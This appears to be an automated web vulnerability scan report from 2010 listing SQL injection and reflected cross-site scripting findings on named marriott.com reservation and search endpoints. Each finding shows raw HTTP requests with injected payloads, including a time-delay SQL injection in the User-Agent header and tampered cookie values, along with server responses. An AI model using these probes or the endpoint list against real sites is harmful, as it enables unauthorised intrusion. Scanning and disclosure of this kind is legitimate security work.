1.1. https://www.marriott.com/reservation/availability.mi [User-Agent HTTP header]
1.2. https://www.marriott.com/reservation/invalidInput.mi [MI_Visitor cookie]
2. Cross-site scripting (reflected)
2.1. https://www.marriott.com/reservation/availabilitySearch.mi [fromDate parameter]
2.2. https://www.marriott.com/reservation/availabilitySearch.mi [toDate parameter]
2.3. https://www.marriott.com/search/submitSearch.mi [fromDate parameter]
2.4. https://www.marriott.com/search/submitSearch.mi [toDate parameter]
Severity: | High |
Confidence: | Certain |
Host: | https://www.marriott.com |
Path: | /reservation/availability |
GET /reservation/availability Host: www.marriott.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)')waitfor%20delay'0%3a0 Connection: close Cookie: FormInfoCookie=d6301"> |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Length: 73248 Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=0000MLsOJPDc Set-Cookie: MI_SITE=prod1;path=/ Set-Cookie: FormInfoCookie=10/25/2010 Pragma: no-cache Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Mon, 25 Oct 2010 19:29:17 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.marriott.com |
Path: | /reservation/invalidInput |
GET /reservation/invalidInput Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: VSC=EC029FEE891C66F7; MI_Visitor=JICChkuOY Host: www.marriott.com |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=0000xSpvH Set-Cookie: MI_SITE=prod1;path=/ Set-Cookie: FormInfoCookie=10/25/2010 Pragma: no-cache Vary: Accept-Encoding Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Mon, 25 Oct 2010 18:35:32 GMT Connection: keep-alive Content-Length: 73248 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascript" src="/tsedge_instr-min.js <title> Cannot Process Request </title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style <link rel="search" type="application <link rel="search" type="application <script type="text/javascript">if <link rel="stylesheet" type="text/css" media="all" href="/miCSSPath <link rel="stylesheet" type="text/css" media="all" ...[SNIP]... |
GET /reservation/invalidInput Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: VSC=EC029FEE891C66F7; MI_Visitor=JICChkuOY Host: www.marriott.com |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Type: text/html; charset=UTF-8 Set-Cookie: FormInfoCookie=10/25/2010 Set-Cookie: MI_SITE=prod1;path=/ Pragma: no-cache Vary: Accept-Encoding Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Mon, 25 Oct 2010 18:35:33 GMT Connection: keep-alive Content-Length: 73248 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascript" src="/tsedge_instr-min.js <title> Cannot Process Request </title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style <link rel="search" type="application <link rel="search" type="application <script type="text/javascript">if <link rel="stylesheet" type="text/css" media="all" href="/miCSSPath <link rel="stylesheet" type="text/css" media="all" href="/miCSSPath ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.marriott.com |
Path: | /reservation/rateListMenu |
GET /reservation/rateListMenu Host: www.marriott.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: FormInfoCookie=d6301"> |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Length: 72709 Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=0000Sg0fC Set-Cookie: MI_SITE=prod1;path=/ Set-Cookie: FormInfoCookie=10/25/2010 Pragma: no-cache Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Mon, 25 Oct 2010 19:08:08 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.marriott.com |
Path: | /reservation/availab |
GET /reservation/availab Host: www.marriott.com Connection: keep-alive Referer: https://www.marriott.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VSC=CBE450760211218D; MI_Visitor=-Yxkj |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=00007VLN8_A Set-Cookie: MI_SITE=prod1;path=/ Set-Cookie: FormInfoCookie=d6301"> Pragma: no-cache Vary: Accept-Encoding Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Mon, 25 Oct 2010 18:23:12 GMT Connection: keep-alive Content-Length: 92925 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... <input type="text" name="fromDate" id="global-header-hotel ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.marriott.com |
Path: | /reservation/availab |
GET /reservation/availab Host: www.marriott.com Connection: keep-alive Referer: https://www.marriott.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VSC=CBE450760211218D; MI_Visitor=-Yxkj |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=0000s Set-Cookie: MI_SITE=prod1;path=/ Set-Cookie: FormInfoCookie=10/28/2010 Pragma: no-cache Vary: Accept-Encoding Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Mon, 25 Oct 2010 18:32:27 GMT Connection: keep-alive Content-Length: 92926 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... <input type="text" name="toDate" id="global-header-hotel ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.marriott.com |
Path: | /search/submitSearch.mi |
GET /search/submitSearch.mi Host: www.marriott.com Connection: keep-alive Referer: https://www.marriott.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VSC=CBE450760211218D; MI_Visitor=-Yxkj |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=0000OLISRU Set-Cookie: MI_SITE=prod1;path=/ Set-Cookie: FormInfoCookie=1dd5e"> Expires: Thu, 01 Dec 1994 16:00:00 GMT Vary: Accept-Encoding Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Date: Mon, 25 Oct 2010 18:50:57 GMT Connection: keep-alive Content-Length: 163587 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="text" name="fromDate" id="global-header-hotel ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.marriott.com |
Path: | /search/submitSearch.mi |
GET /search/submitSearch.mi Host: www.marriott.com Connection: keep-alive Referer: https://www.marriott.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VSC=CBE450760211218D; MI_Visitor=-Yxkj |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) DAV/2 Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=0000AH1gHq Set-Cookie: MI_SITE=prod1;path=/ Set-Cookie: FormInfoCookie=10/28/2010 Expires: Thu, 01 Dec 1994 16:00:00 GMT Vary: Accept-Encoding Content-Language: en-US P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Date: Mon, 25 Oct 2010 19:20:35 GMT Connection: keep-alive Content-Length: 163590 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="text" name="toDate" id="global-header-hotel ...[SNIP]... |